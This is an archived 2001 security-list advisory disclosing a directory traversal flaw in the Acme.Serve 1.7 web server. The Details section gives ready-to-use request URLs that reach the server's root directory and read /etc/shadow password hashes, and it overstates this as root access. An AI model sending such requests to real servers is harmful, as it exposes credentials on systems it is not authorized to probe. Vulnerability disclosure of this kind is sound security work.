OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Adnan Rahman (adnan.rahmanas19.org)
Date: Thu May 31 2001 - 15:34:16 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ----------------------------------------------------------------------
    Date: 31.05.2001
    Affected Software: Acme.Serve v1.7 of 13nov96 (http://www.acme.com)
    Exploit: Browsing of directories and files allowed to unauthorized users
    Keywords: Cisco Secure Administration, Netscape FastTrack, ...
    Contact: AS19 Team (infoas19.org)
    ----------------------------------------------------------------------

    Platforms: Sun + Unix

    Details: Connect to http://potentialvictim:9090/// and you should have
    access to the root dir of the machine running Acme.Serve 1.7.
    http://potentialvictim:9090//etc/shadow and you can view the hash. You have
    r00t privilegies.

    Greetings, AS19 Team (http://www.as19.org)